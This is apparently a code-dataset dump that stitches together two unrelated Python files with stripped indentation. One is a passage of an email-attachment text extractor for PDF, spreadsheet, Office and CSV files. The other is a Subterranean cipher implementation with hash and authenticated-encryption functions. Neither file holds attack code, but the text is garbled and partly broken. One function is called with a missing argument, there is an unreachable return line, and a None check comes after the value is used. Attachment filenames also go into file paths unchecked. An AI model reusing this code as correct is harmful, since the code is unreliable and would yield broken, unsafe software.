self._emailstore = emailstore
self._message = None
self._encoded_text = None
self._extracted_text = None
self._edit_differences = None
self._difference_file_exists = None
self._date = None
self._delivery_date = None
def __eq__(self, other):
"""Return True if self.filename == other.filename."""
return self.filename == other.filename
def __lt__(self, other):
"""Return True if self.filename < other.filename."""
return self.filename < other.filename
@property
def email_path(self):
""" """
return os.path.join(self._emailstore.mailstore, self.filename)
@property
def difference_file_path(self):
""" """
return os.path.join(
self._emailstore._extracts, os.path.splitext(self.filename)[0]
)
@property
def difference_file_exists(self):
"""Return True if difference file existed when edit_differences set.
True means the email does not change the original text.
False means the edited version of text is copied from the email text.
None means answer is unknown because edit_differences has not been set.
"""
return self._difference_file_exists
def is_from_addressee_in_selection(self, selection):
""" """
if selection is None:
return True
from_ = parseaddr(self.message.get("From"))[-1]
if not selection:
return self.message.generate_filename()
# Ignore emails not sent by someone in self.emailsender.
# Account owners may be in that set, so emails sent from one
# account owner to another can get selected.
if from_ in selection:
return self.message.generate_filename()
else:
return False
@property
def message(self):
""" """
if self._message is None:
mf = open(self.email_path, "rb")
try:
self._message = message_from_binary_file(
mf, _class=MessageFile
)
self._date = [
parsedate_tz(d)[:-1]
for d in self.message.get_all("date", [])
]
self._delivery_date = [
parsedate_tz(d)[:-1]
for d in self.message.get_all("delivery-date", [])
]
finally:
mf.close()
return self._message
@property
def encoded_text(self):
""" """
if self._encoded_text is None:
ems = self._emailstore
text = []
for p in self.message.walk():
cte = p.get("Content-Transfer-Encoding")
if cte:
if cte.lower() == "base64":
t = p.get_payload(decode=True)
if t:
text.append(t)
# If no text at all is extracted return a single blank line.
if not text:
text.append(b"\n")
# Ensure the extracted text ends with a newline so that editing of
# the last line causes difflib processing to append the '? ---\n'
# or '? +++\n' as a separate line in the difference file.
# This may make the one character adjustment done by
# _insert_entry() in the SourceEdit class redundant.
# The reason to not do this all along was to avoid making any
# change at all between the selected email payload and the original
# version held in the difference file, including an extra newline.
# Attempts to wrap difflib functions to cope seem not worth it, if
# such prove possible at all.
if not text[-1].endswith(b"\n"):
text[-1] = b"".join((text[-1], b"\n"))
self._encoded_text = text
return self._encoded_text
def _extract_text(
self, content_type, filename, payload, text, charset=None
):
ems = self._emailstore
if content_type == _PDF:
if _PDFTOTEXT:
self._get_pdf_text_using_xpdf(filename, payload, text)
elif pdfminer:
self.get_pdf_text_using_pdfminer3k(None, payload, text)
elif content_type == _SS:
if _SSTOCSV:
self._get_ss_text_using_gnumeric(filename, payload, text)
elif content_type == _XLSX:
if _SSTOCSV:
self._get_ss_text_using_gnumeric(filename, payload, text)
elif xlsx2csv:
self._get_ss_text_using_xlsx2csv(filename, payload, text)
elif content_type == _ODS:
if _SSTOCSV:
self._get_ss_text_using_gnumeric(filename, payload, text)
else:
self._get_ods_text_using_python_xml(filename, payload, text)
elif content_type == _CSV:
if ems.include_csv_file:
if filename not in ems.include_csv_file:
return
elif ems.exclude_csv_file:
if filename in ems.exclude_csv_file:
return
text.append(self.get_csv_text(payload, charset))
elif content_type == _TXT:
text.append(payload.decode(charset))
elif content_type == _DOCX:
text.append(self.get_docx_text(payload, ems.eventdirectory))
elif content_type == _ODT:
text.append(self.get_odt_text(payload, ems.eventdirectory))
@property
def extracted_text(self):
""" """
if self._extracted_text is None:
ems = self._emailstore
text = []
for p in self.message.walk():
ct = p.get_content_type()
if ct in ems.pdf_content_type:
self._extract_text(
_PDF,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct in ems.ss_content_type:
self._extract_text(
_SS, p.get_filename(), p.get_payload(decode=True), text
)
elif ct in ems.xlsx_content_type:
self._extract_text(
_XLSX,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct in ems.ods_content_type:
self._extract_text(
_ODS,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct in ems.csv_content_type:
self._extract_text(
_CSV,
p.get_filename(),
p.get_payload(decode=True),
text,
charset=p.get_param("charset", failobj="utf-8"),
)
elif ct in ems.text_content_type:
self._extract_text(
_TXT,
p.get_filename(),
p.get_payload(decode=True),
text,
charset=p.get_param("charset", failobj="iso-8859-1"),
)
elif ct in ems.docx_content_type:
self._extract_text(
_DOCX,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct in ems.odt_content_type:
self._extract_text(
_ODT,
p.get_filename(),
p.get_payload(decode=True),
text,
)
elif ct == "application/ms-tnef":
if not tnefparse:
text.append(
"".join(
(
"Cannot process attachment: ",
"tnefparse is not installed.",
)
)
)
continue
# I do not know if the wrapped attachment type names are
# encoded within the application/ms-tnef attachment, or the
# mapping if so. Fall back on assumption from file name
# extension.
# Similar point applies for charset argument used when
# extracting csv or txt attachments.
# As far as I know, the only application/ms-tnef
# attachments ever received by me at time of writing
# contain just *.txt attachments. These are not processed
# by this route.
tnef = tnefparse.TNEF(base64.b64decode(p.get_payload()))
for attachment in tnef.attachments:
name = attachment.name
for e in _PDF, _XLSX, _ODS, _CSV, _TXT, _DOCX, _ODT:
if name.lower().endswith(e):
self._extract_text(
e,
attachment.name,
attachment.data,
text,
charset="iso-8859-1",
)
break
else:
text.append(
"".join(
(
"Cannot process '",
name,
"' extracted from application/",
"ms-tnef attachment.",
)
)
)
# If no text at all is extracted return a single blank line.
if not text:
text.append("\n")
# Ensure the extracted text ends with a newline so that editing of
# the last line causes difflib processing to append the '? ---\n'
# or '? +++\n' as a separate line in the difference file.
# This may make the one character adjustment done by
# _insert_entry() in the SourceEdit class redundant.
# The reason to not do this all along was to avoid making any
# change at all between the selected email payload and the original
# version held in the difference file, including an extra newline.
# Attempts to wrap difflib functions to cope seem not worth it, if
# such prove possible at all.
if not text[-1].endswith("\n"):
text[-1] = "".join((text[-1], "\n"))
self._extracted_text = text
return self._extracted_text
def _is_attachment_to_be_extracted(self, attachment_filename):
ems = self._emailstore
if ems.include_ss_file_sheet:
if attachment_filename not in ems.include_ss_file_sheet:
return
elif ems.exclude_ss_file_sheet:
if attachment_filename in ems.exclude_ss_file_sheet:
return
if _decode_header(attachment_filename) is None:
tkinter.messagebox.showinfo(
parent=self._emailstore.parent,
title="Extract Spreadsheet Data",
message="Spreadsheet attachment does not have a filename.",
)
return
return True
def _create_temporary_attachment_file(self, filename, payload, dirbase):
a = _decode_header(filename)
try:
os.mkdir(os.path.join(dirbase, "xls-attachments"))
except:
pass
op = open(os.path.join(dirbase, "xls-attachments", a), "wb")
try:
op.write(payload)
finally:
op.close()
return a
def _get_ss_text_using_gnumeric(self, filename, payload, text):
fn = filename
if not self._is_attachment_to_be_extracted(fn):
return
ems = self._emailstore
taf = self._create_temporary_attachment_file(
filename, payload, ems.eventdirectory
)
process = subprocess.Popen(
(_SSTOCSV, "--recalc", "-S", taf, "%s.csv"),
cwd=os.path.join(ems.eventdirectory, "xls-attachments"),
)
process.wait()
if process.returncode == 0:
sstext = []
for sheet, sheettext in self.get_spreadsheet_text(
ems.eventdirectory
):
if fn in ems.include_ss_file_sheet:
if ems.include_ss_file_sheet[fn]:
if sheet not in ems.include_ss_file_sheet[fn]:
continue
elif fn in ems.exclude_ss_file_sheet:
if ems.exclude_ss_file_sheet[fn]:
if sheet in ems.exclude_ss_file_sheet[fn]:
continue
else:
continue
sstext.append(sheettext)
text.append("\n\n".join(sstext))
shutil.rmtree(
os.path.join(ems.eventdirectory, "xls-attachments"),
ignore_errors=True,
)
def _get_ss_text_using_xlsx2csv(self, filename, payload, text):
fn = filename
if not self._is_attachment_to_be_extracted(fn):
return
ems = self._emailstore
taf = os.path.join(
ems.eventdirectory,
"xls-attachments",
self._create_temporary_attachment_file(
filename, payload, ems.eventdirectory
),
)
# Extract all sheets and filter afterwards.
# xlsx2csv can do the filtering and will be used to do so later.
# outputencoding has to be given, even though it is default value, to
# avoid a KeyError exception on options passed to Xlsx2csv in Python 3.
# The defaults of other arguments are used as expected.
xlsx2csv.Xlsx2csv(
taf,
skip_empty_lines=True,
sheetid=0,
dateformat="%Y-%m-%d",
outputencoding="utf-8",
).convert(
os.path.join(ems.eventdirectory, "xls-attachments"), sheetid=0
)
sstext = []
for sheet, sheettext in self.get_spreadsheet_text(ems.eventdirectory):
if fn in ems.include_ss_file_sheet:
if ems.include_ss_file_sheet[fn]:
if sheet not in ems.include_ss_file_sheet[fn]:
continue
elif fn in ems.exclude_ss_file_sheet:
if ems.exclude_ss_file_sheet[fn]:
if sheet in ems.exclude_ss_file_sheet[fn]:
continue
else:
continue
sstext.append(sheettext)
text.append("\n\n".join(sstext))
shutil.rmtree(
os.path.join(ems.eventdirectory, "xls-attachments"),
ignore_errors=True,
)
def _get_ods_text_using_python_xml(self, filename, payload, text):
nstable = "{urn:oasis:names:tc:opendocument:xmlns:table:1.0}"
nstext = "{urn:oasis:names:tc:opendocument:xmlns:text:1.0}"
nsoffice = "{urn:oasis:names:tc:opendocument:xmlns:office:1.0}"
def get_rows(table):
rows = []
for row in table.iter(nstable + "table-row"):
rows.append({})
cells = rows[-1]
for cell in row.iter(nstable + "table-cell"):
repeat = int(
cell.attrib.get(
nstable + "number-columns-repeated", "1"
)
)
if cell.attrib.get(nsoffice + "value-type") == "date":
paragraphs = [cell.attrib[nsoffice + "date-value"]]
else:
paragraphs = []
for element in cell.iter(nstext + "p"):
if element.text is not None:
paragraphs.append(element.text)
text = "\n\n".join(paragraphs)
for r in range(repeat):
cells[len(cells)] = text if paragraphs else None
# Discard leading and trailing empty columns, and empty rows.
# No need to convert remaining Nones to ''s because csv module
# DictWriter.writerows() method does it.
trailing = -1
leading = max(len(r) for r in rows)
for r in rows:
notnone = sorted(k for k, v in r.items() if v is not None)
if notnone:
trailing = max(notnone[-1], trailing)
leading = min(notnone[0], leading)
for r in rows:
columns = list(r.keys())
for c in columns:
if c > trailing or c < leading:
del r[c]
return [
r
for r in rows
if len([v for v in r.values() if v is not None])
]
ems = self._emailstore
fn = filename
if ems.include_ss_file_sheet:
if fn not in ems.include_ss_file_sheet:
return
elif ems.exclude_ss_file_sheet:
if fn in ems.exclude_ss_file_sheet:
return
xmlzip = zipfile.ZipFile(io.BytesIO(payload))
archive = {}
for n in xmlzip.namelist():
with xmlzip.open(n) as f:
archive[n] = f.read()
for k, v in archive.items():
if os.path.basename(k) == "content.xml":
tree = xml.etree.ElementTree.XML(v)
sstext = []
for spreadsheet in tree.iter(nsoffice + "spreadsheet"):
for table in spreadsheet.iter(nstable + "table"):
sheet = table.attrib[nstable + "name"]
if fn in ems.include_ss_file_sheet:
if ems.include_ss_file_sheet[fn]:
if sheet not in ems.include_ss_file_sheet[fn]:
continue
elif fn in ems.exclude_ss_file_sheet:
if ems.exclude_ss_file_sheet[fn]:
if sheet in ems.exclude_ss_file_sheet[fn]:
continue
else:
continue
rows = get_rows(table)
if not rows:
continue
fieldnames = [c for c in sorted(rows[0].keys())]
csvfile = io.StringIO()
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerows(rows)
try:
sstext.append(
self.extract_text_from_csv(
csvfile, sheet=sheet
)
)
except KeyError:
raise EmailExtractorError
text.append("\n\n".join(sstext))
def get_docx_text(self, payload, dirbase):
"""Return text extracted from part, an Office Open XML email attachment.
This is Microsoft's *.docx format, not to be confused with *.odt format
which is Open Office XML (or Open Document Format).
"""
# Thanks to
# http://etienned.github.io/posts/extract-text-from-word-docs-simply/
# for which pieces to take from *.docx file.
nsb = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
xmlzip = zipfile.ZipFile(io.BytesIO(payload))
archive = {}
for n in xmlzip.namelist():
with xmlzip.open(n) as f:
archive[n] = f.read()
text = []
for k, v in archive.items():
if os.path.basename((os.path.splitext(k)[0])) == "document":
paragraphs = []
tree = xml.etree.ElementTree.XML(v)
for p in tree.iter(nsb + "p"):
t = [n.text for n in p.iter(nsb + "t") if n.text]
if t:
paragraphs.append("".join(t))
text.append("\n\n".join(paragraphs))
return "\n".join(text)
def get_odt_text(self, payload, dirbase):
"""Return text extracted from part, an Open Office XML email attachment.
This is *.odt format (or Open Document Format), not to be confused
with Microsoft's *.docx format (or Office Open XML).
"""
nsb = "{urn:oasis:names:tc:opendocument:xmlns:text:1.0}"
topelems = {nsb + "p", nsb + "h"}
def get_text(element):
# Thanks to https://github.com/deanmalmgren/textract
# for which pieces to take from *.odt file.
text = []
if element.text is not None:
text.append(element.text)
for child in element:
if child.tag == nsb + "tab":
text.append("\t")
if child.tail is not None:
text.append(child.tail)
elif child.tag == nsb + "s":
text.append(" ")
if child.get(nsb + "c") is not None:
text.append(" " * (int(child.get(nsb + "c")) - 1))
if child.tail is not None:
text.append(child.tail)
else:
text.append(get_text(child))
if element.tail is not None:
text.append(element.tail)
return "".join(text)
xmlzip = zipfile.ZipFile(io.BytesIO(payload))
archive = {}
for n in xmlzip.namelist():
with xmlzip.open(n) as f:
archive[n] = f.read()
text = []
for k, v in archive.items():
if os.path.basename((os.path.splitext(k)[0])) == "content":
for child in xml.etree.ElementTree.fromstring(v).iter():
if child.tag in topelems:
text.append(get_text(child))
return "\n".join(text)
def _get_pdf_text_using_xpdf(self, filename, payload, text):
"""Use pdf2text utility (part of xpdf) to extract text."""
a = _decode_header(filename)
aout = a + ".txt"
if a is None:
tkinter.messagebox.showinfo(
parent=self._emailstore.parent,
title="Extract PDF Data",
message="PDF attachment does not have a filename.",
)
return ""
dirbase = self._emailstore.eventdirectory
try:
os.mkdir(os.path.join(dirbase, "pdf-attachments"))
except:
pass
op = open(os.path.join(dirbase, "pdf-attachments", a), "wb")
try:
op.write(payload)
finally:
op.close()
process = subprocess.Popen(
(
_PDFTOTEXT,
"-nopgbrk", # no way of saying this in pdfminer3k.
"-layout",
a,
aout,
),
cwd=os.path.join(dirbase, "pdf-attachments"),
)
process.wait()
if process.returncode == 0:
if os.path.exists(os.path.join(dirbase, "pdf-attachments", aout)):
op = open(
os.path.join(dirbase, "pdf-attachments", aout),
"r",
encoding="iso-8859-1",
)
try:
text.append(op.read())
finally:
op.close()
shutil.rmtree(
os.path.join(dirbase, "pdf-attachments"), ignore_errors=True
)
def get_pdf_text_using_pdfminer3k(
self, filename, payload, text, char_margin=150, word_margin=1, **k
):
"""Use pdfminer3k functions to extract text from pdf by line (row).
The char_margin and word_margin defaults give a reasonable fit to
pdftotext (part of xpdf) behaviour with the '-layout' option.
char_margin seems to have no upper limit as far as fitting with the
'-layout' option is concerned, but a word_margin value of 1.5 caused
words to be concatenated from the PDF document tried. However the
word_margin default (0.1) caused 'W's at the start of a word to be
treated as a separate word: 'Winchester' becomes 'W inchester'. There
must be something else going on because 'Winchester' remained as
'Winchester' in another, less tabular, PDF document.
The PDF document has a tabular layout (read each row) which seems to
get treated as a column layout (read each column) with the LAParams
defaults set out below.
**k captures other arguments which override defaults for pdfminer3k's
LAParams class.
At pdfminer3k-1.3.1 the arguments and their defaults are:
line_overlap=0.5
char_margin=2.0
line_margin=0.5
word_margin=0.1
boxes_flow=0.5
detect_vertical=False
all_texts=False
paragraph_indent=None
heuristic_word_margin=False
"""
# Adapted from pdf2txt.py script included in pdfminer3k-1.3.1.
# On some *.pdf inputs the script raises UnicodeEncodeError:
# 'ascii' codec can't encode character ...
# which does not happen with the adaption below.
# A sample ... is '\u2019 in position 0: ordinal not in range(128)'.
# Changing 'outfp = io.open(...)' to 'outfp = open(...)' was sufficient
# but here it is most convenient to say 'outfp = io.StringIO()'.
caching = True
rsrcmgr = pdfinterp.PDFResourceManager(caching=caching)
laparams = layout.LAParams(
char_margin=char_margin, word_margin=word_margin
)
for a in laparams.__dict__:
if a in k:
laparams.__dict__[a] = k[a]
outfp = io.StringIO()
device = converter.TextConverter(rsrcmgr, outfp, laparams=laparams)
try:
fp = io.BytesIO(payload)
try:
pdfinterp.process_pdf(
rsrcmgr,
device,
fp,
pagenos=set(),
maxpages=0,
password="",
caching=caching,
check_extractable=True,
)
finally:
fp.close()
finally:
device.close()
text.append(outfp.getvalue())
outfp.close()
def get_spreadsheet_text(self, dirbase):
"""Return (sheetname, text) from spreadsheet attachment part.
dirbase is the event directory where a temporary directory is created
to hold temporary files for the attachment extracts.
"""
text = []
for fn in os.listdir(os.path.join(dirbase, "xls-attachments")):
sheetname, e = os.path.splitext(fn)
if e.lower() != ".csv":
continue
sheetname = sheetname.lower()
csvp = os.path.join(dirbase, "xls-attachments", fn)
if not os.path.exists(csvp):
continue
try:
text.append(
(
sheetname,
self.extract_text_from_csv(
self._read_file(csvp), sheet=sheetname
),
)
)
except KeyError:
raise EmailExtractorError
except csv.Error as exc:
tkinter.messagebox.showinfo(
parent=self._emailstore.parent,
title="Extract Text from CSV",
message="".join(
(
str(exc),
"\n\nreported by csv module for sheet\n\n",
os.path.splitext(fn)[0],
"\n\nwhich is not included in extracted text.",
)
),
)
return text
def extract_text_from_csv(self, text, sheet=None, filename=None):
"""Return text if it looks like CSV format, otherwise ''.
A csv.Sniffer determines the csv dialect and text is accepted as csv
format if the delimeiter seems to be in ',/t;:'.
"""
text = text.getvalue()
dialect = csv.Sniffer().sniff(text)
if dialect.delimiter not in ",/t;:":
return ""
# All the translation in code taken from results.core.emailextractor
# at results-2.2 is removed because it is specific to application.
# Maybe this method should return the list of rows in case caller will
# do more filtering? (and the other extract_* methods)
return text
def get_csv_text(self, payload, charset):
"""Return text from part, a csv attachment to an email."""
try:
return self.extract_text_from_csv(
io.StringIO(self._decode_payload(payload, charset))
)
except KeyError:
raise EmailExtractorError
def _decode_payload(self, payload, charset):
"""Return decoded payload; try 'utf-8' then 'iso-8859-1'.
iso-8859-1 should not fail but if it does fall back to ascii with
replacement of bytes that do not decode.
The current locale is not used because the decode must be the same
every time it is done.
"""
for c in charset, "iso-8859-1":
try:
return self._accept_csv_file_with_nul_characters(
payload.decode(encoding=c)
)
return t
except UnicodeDecodeError:
pass
else:
return self._accept_csv_file_with_nul_characters(
payload.decode(encoding="ascii", errors="replace")
)
def _accept_csv_file_with_nul_characters(self, csvstring):
"""Dialogue asking what to do with csv file with NULs"""
nulcount = csvstring.count(_NUL)
if nulcount:
if (
tkinter.messagebox.askquestion(
parent=self._emailstore.parent,
title="Update Extracted Text",
message="".join(
(
"A csv file attachment to an email contains NUL ",
"characters.\n\nDo you wish to include the ",
"significant characters from this file?\n\n",
str(len(csvstring)),
" characters in file.\n",
str(nulcount),
" NULs in file.\n",
str(len(csvstring) - nulcount),
" significant characters in file.",
)
),
)
!= tkinter.messagebox.YES
):
return ""
csvstring = csvstring.replace(_NUL, "")
return csvstring
def _read_file(self, csvpath):
"""Return StringIO object containing decoded payload.
Try 'utf-8' then 'iso-8859-1' and finally 'ascii' with errors replaced.
"""
for c in "utf-8", "iso-8859-1":
csvfile = open(csvpath, encoding=c)
try:
return io.StringIO(csvfile.read())
except UnicodeDecodeError:
pass
finally:
csvfile.close()
else:
csvfile = open(csvpath, encoding="ascii", errors="replace")
try:
return io.StringIO(csvfile.read())
except UnicodeDecodeError:
pass
finally:
csvfile.close()
@property
def edit_differences(self):
"""Return list(difflin.ndiff()) of original and edited email text."""
if self._edit_differences is None:
try:
text = self._read_file(self.difference_file_path).readlines()
self._difference_file_exists = True
except FileNotFoundError:
lines = "\n".join(self.extracted_text).splitlines(1)
text = list(difflib.ndiff(lines, lines))
self._difference_file_exists = False
self._edit_differences = text
return self._edit_differences
def write_additional_file(self):
"""Write difference file, utf-8 encoding, if file does not exist."""
if self._difference_file_exists is False:
f = open(
self.difference_file_path,
mode="w",
encoding="utf8",
)
try:
f.writelines(self.edit_differences)
self._difference_file_exists = True
finally:
f.close()
@property
def dates(self):
"""Return tuple(date, delivery_dates)."""
return self._date, self._delivery_date
def _decode_header(value):
"""Decode a parameter according to RFC2231 and return the decoded string."""
b, c = email.header.decode_header(value)[0]
return b if c is None else b.decode(c)
|
StarcoderdataPython
|
1875525
|
<reponame>siweisun/hw-subterranean
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import binascii
SUBTERRANEAN_SIZE = 257
def bits_to_hex_string(in_bits, big_endian=True):
string_state = ""
if(len(in_bits)%8 == 0):
final_position = len(in_bits) - 8
else:
final_position = len(in_bits) - (len(in_bits)%8)
for i in range(0, final_position, 8):
temp_value = in_bits[i] + 2*in_bits[i+1] + 4*in_bits[i+2] + 8*in_bits[i+3] + 16*in_bits[i+4] + 32*in_bits[i+5] + 64*in_bits[i+6] + 128*in_bits[i+7]
if(big_endian):
string_state = string_state + "{0:02x}".format(temp_value)
else:
string_state = "{0:02x}".format(temp_value) + string_state
mult_factor = 1
temp_value = 0
for i in range(final_position, len(in_bits)):
temp_value += mult_factor*in_bits[i]
mult_factor *= 2
if(big_endian):
string_state = string_state + "{0:02x}".format(temp_value)
else:
string_state = "{0:02x}".format(temp_value) + string_state
return string_state
def bytearray_to_bits(value):
value_bits = [((int(value[i//8]) & (1 << (i%8))) >> (i%8)) for i in range(len(value)*8)]
return value_bits
def bits_to_bytearray(value):
value_bytearray = bytearray((len(value)+7)//8)
if(len(value) != 0):
if(len(value)%8 == 0):
final_position = len(value) - 8
else:
final_position = len(value) - (len(value)%8)
j = 0
for i in range(0, final_position, 8):
value_bytearray[j] = value[i] + 2*value[i+1] + 4*value[i+2] + 8*value[i+3] + 16*value[i+4] + 32*value[i+5] + 64*value[i+6] + 128*value[i+7]
j += 1
mult_factor = 1
value_bytearray[j] = 0
for i in range(final_position, len(value)):
value_bytearray[j] += mult_factor*value[i]
mult_factor *= 2
return value_bytearray
def subterranean_round(state_bits):
# Chi step
new_state_bits = [state_bits[i] ^ ((1 ^ state_bits[(i+1) % SUBTERRANEAN_SIZE]) & state_bits[(i+2) % SUBTERRANEAN_SIZE]) for i in range(SUBTERRANEAN_SIZE)]
# Iota step
new_state_bits[0] ^= 1
# Theta step
new_state_bits = [new_state_bits[i] ^ new_state_bits[(i+3) % SUBTERRANEAN_SIZE] ^ new_state_bits[(i+8) % SUBTERRANEAN_SIZE] for i in range(SUBTERRANEAN_SIZE)]
# Pi step
new_state_bits = [new_state_bits[(12*i) % SUBTERRANEAN_SIZE] for i in range(SUBTERRANEAN_SIZE)]
return new_state_bits
def subterranean_init():
state = [0 for i in range(SUBTERRANEAN_SIZE)]
return state
def subterranean_duplex(state, sigma):
# s <= R(s)
new_state = subterranean_round(state)
# sbar <= sbar + sigma
index_j = 1;
for i in range(len(sigma)):
new_state[index_j] ^= sigma[i]
index_j = (176*index_j) % SUBTERRANEAN_SIZE
# sbar <= sbar + (1||0*)
new_state[index_j] ^= 1
return new_state
def subterranean_extract(state):
value_out = [0 for i in range(32)]
# value_out <= extract
index_j = 1;
for i in range(32):
value_out[i] = state[index_j] ^ state[SUBTERRANEAN_SIZE-index_j]
index_j = (176*index_j) % SUBTERRANEAN_SIZE
return value_out
def subterranean_absorb_unkeyed(state, value_in):
new_state = [state[i] for i in range(len(state))]
i = 0
while(i < len(value_in) - 7):
new_state = subterranean_duplex(new_state, value_in[i:i+8])
new_state = subterranean_duplex(new_state, [])
i += 8
new_state = subterranean_duplex(new_state, value_in[i:])
new_state = subterranean_duplex(new_state, [])
return new_state
def subterranean_absorb_keyed(state, value_in):
new_state = [state[i] for i in range(len(state))]
i = 0
while(i < len(value_in) - 31):
new_state = subterranean_duplex(new_state, value_in[i:i+32])
i += 32
new_state = subterranean_duplex(new_state, value_in[i:])
return new_state
def subterranean_absorb_encrypt(state, value_in):
new_state = [state[i] for i in range(len(state))]
# Y <= *
value_out = []
i = 0
while(i < len(value_in) - 31):
temp_value_state = subterranean_extract(new_state)
temp_value_out = [value_in[i+j] ^ temp_value_state[j] for j in range(32)]
new_state = subterranean_duplex(new_state, value_in[i:i+32])
value_out = value_out + temp_value_out
i += 32
temp_value_state = subterranean_extract(new_state)
temp_value_out = [value_in[i+j] ^ temp_value_state[j] for j in range(len(value_in)-i)]
new_state = subterranean_duplex(new_state, value_in[i:])
value_out = value_out + temp_value_out
return new_state, value_out
def subterranean_absorb_decrypt(state, value_in):
new_state = [state[i] for i in range(len(state))]
# Y <= *
value_out = []
i = 0
while(i < len(value_in) - 31):
temp_value_state = subterranean_extract(new_state)
temp_value_out = [value_in[i+j] ^ temp_value_state[j] for j in range(32)]
new_state = subterranean_duplex(new_state, temp_value_out)
value_out = value_out + temp_value_out
i += 32
temp_value_state = subterranean_extract(new_state)
temp_value_out = [value_in[i+j] ^ temp_value_state[j] for j in range(len(value_in)-i)]
new_state = subterranean_duplex(new_state, temp_value_out)
value_out = value_out + temp_value_out
return new_state, value_out
def subterranean_blank(state, r_calls):
new_state = [state[i] for i in range(len(state))]
for i in range(r_calls):
new_state = subterranean_duplex(new_state, [])
return new_state
def subterranean_squeeze(state, size_l):
new_state = [state[i] for i in range(len(state))]
# Z <= *
Z = []
i = 0
while(i < size_l - 32):
temp_value_out = subterranean_extract(new_state)
new_state = subterranean_duplex(new_state, [])
Z = Z + temp_value_out
i += 32
temp_value_out = subterranean_extract(new_state)
new_state = subterranean_duplex(new_state, [])
Z = Z + temp_value_out[:(size_l-i)]
return new_state, Z
def subterranean_xof_init():
# S <= Subterranean()
state = subterranean_init()
return state
def subterranean_xof_update(state, message):
new_state = subterranean_absorb_unkeyed(state, message)
return new_state
def subterranean_xof_finalize(state, size_l):
# S.blank(8)
new_state = subterranean_blank(state, 8)
# Z <= S.squeeze(l)
new_state, z = subterranean_squeeze(new_state, size_l)
return new_state, z
def subterranean_xof_direct(message, size_l):
# S <= Subterranean()
state = subterranean_init()
# Only one single message to absorb
state = subterranean_absorb_unkeyed(state, message)
# S.blank(8)
state = subterranean_blank(state, 8)
# Z <= S.squeeze(l)
state, z = subterranean_squeeze(state, size_l)
return z
def subterranean_deck_init(key):
# S <= Subterranean()
state = subterranean_init()
# S.absorb(K,MAC)
state = subterranean_absorb_keyed(state, key)
return state
def subterranean_deck_update(state, message):
new_state = subterranean_absorb_keyed(state, message)
return new_state
def subterranean_deck_finalize(state, size_l):
# S.blank(8)
new_state = subterranean_blank(state, 8)
# Z <= S.squeeze(l)
new_state, z = subterranean_squeeze(new_state, size_l)
return new_state, z
def subterranean_deck_direct(key, message, size_l):
# S <= Subterranean()
state = subterranean_init()
# S.absorb(K,MAC)
state = subterranean_absorb_keyed(key)
# Only one single message to absorb
state = subterranean_absorb_keyed(state, message)
# S.blank(8)
state = subterranean_blank(state, 8)
# Z <= S.squeeze(l)
z = subterranean_squeeze(state, size_l)
return z
def subterranean_SAE_start(key, nonce):
# S <= Subterranean()
state = subterranean_init()
# S.absorb(K)
state = subterranean_absorb_keyed(state, key)
# S.absorb(N)
state = subterranean_absorb_keyed(state, nonce)
# S.blank(8)
state = subterranean_blank(state, 8)
return state
def subterranean_SAE_wrap_encrypt(state, associated_data, text, tag_length):
# S.absorb(A,MAC)
new_state = subterranean_absorb_keyed(state, associated_data)
# Y <= S.absorb(X,op)
new_state, new_text = subterranean_absorb_encrypt(new_state, text)
# S.blank(8)
new_state = subterranean_blank(new_state, 8)
# T <= S.squeeze(tau)
new_state, new_tag = subterranean_squeeze(new_state, tag_length)
return new_state, new_text, new_tag
def subterranean_SAE_wrap_decrypt(state, associated_data, text, tag, tag_length):
# S.absorb(A,MAC)
new_state = subterranean_absorb_keyed(state, associated_data)
# Y <= S.absorb(X,op)
new_state, new_text = subterranean_absorb_decrypt(new_state, text)
# S.blank(8)
new_state = subterranean_blank(new_state, 8)
# T <= S.squeeze(tau)
new_state, new_tag = subterranean_squeeze(new_state, tag_length)
# if op = decrypt AND (tag != new_tag) then (Y,T) = (*,*)
if(tag != new_tag):
new_text = []
new_tag = []
return new_state, new_text, new_tag
def subterranean_SAE_direct_encrypt(key, nonce, associated_data, text, tag_length):
# S <= Subterranean()
state = subterranean_init()
#print(bits_to_hex_string(state, False))
# S.absorb(K)
state = subterranean_absorb_keyed(state, key)
#print(bits_to_hex_string(state, False))
# S.absorb(N)
state = subterranean_absorb_keyed(state, nonce)
#print(bits_to_hex_string(state, False))
# S.blank(8)
state = subterranean_blank(state, 8)
#print(bits_to_hex_string(state, False))
# S.absorb(A,MAC)
state = subterranean_absorb_keyed(state, associated_data)
#print(bits_to_hex_string(state, False))
# Y <= S.absorb(X,op)
state, new_text = subterranean_absorb_encrypt(state, text)
#print(bits_to_hex_string(state, False))
# S.blank(8)
state = subterranean_blank(state, 8)
#print(bits_to_hex_string(state, False))
# T <= S.squeeze(tau)
state, new_tag = subterranean_squeeze(state, tag_length)
#print(bits_to_hex_string(state, False))
return new_text, new_tag
def subterranean_SAE_direct_decrypt(key, nonce, associated_data, text, tag, tag_length):
# S <= Subterranean()
state = subterranean_init()
# S.absorb(K)
state = subterranean_absorb_keyed(state, key)
# S.absorb(N)
state = subterranean_absorb_keyed(state, nonce)
# S.blank(8)
state = subterranean_blank(state, 8)
# S.absorb(A,MAC)
state = subterranean_absorb_keyed(state, associated_data)
# Y <= S.absorb(X,op)
state, new_text = subterranean_absorb_decrypt(state, text)
# S.blank(8)
state = subterranean_blank(state, 8)
# T <= S.squeeze(tau)
state, new_tag = subterranean_squeeze(state, tag_length)
# if op = decrypt AND (tag != new_tag) then (Y,T) = (*,*)
if(tag != new_tag):
print(tag)
print(new_tag)
new_text = []
new_tag = []
return new_text, new_tag
def crypto_hash(m, out_length_bytes):
m_bits = bytearray_to_bits(m)
hash_bits = subterranean_xof_direct(m_bits, out_length_bytes*8)
hash_out = bits_to_bytearray(hash_bits)
return hash_out
def crypto_aead_encrypt(m, ad, nsec, npub, k, t_length_bytes):
m_bits = bytearray_to_bits(m)
ad_bits = bytearray_to_bits(ad)
npub_bits = bytearray_to_bits(npub)
k_bits = bytearray_to_bits(k)
c_bits, t_bits = subterranean_SAE_direct_encrypt(k_bits, npub_bits, ad_bits, m_bits, t_length_bytes*8)
joined_c_bits = c_bits + t_bits
joined_c = bits_to_bytearray(joined_c_bits)
return joined_c
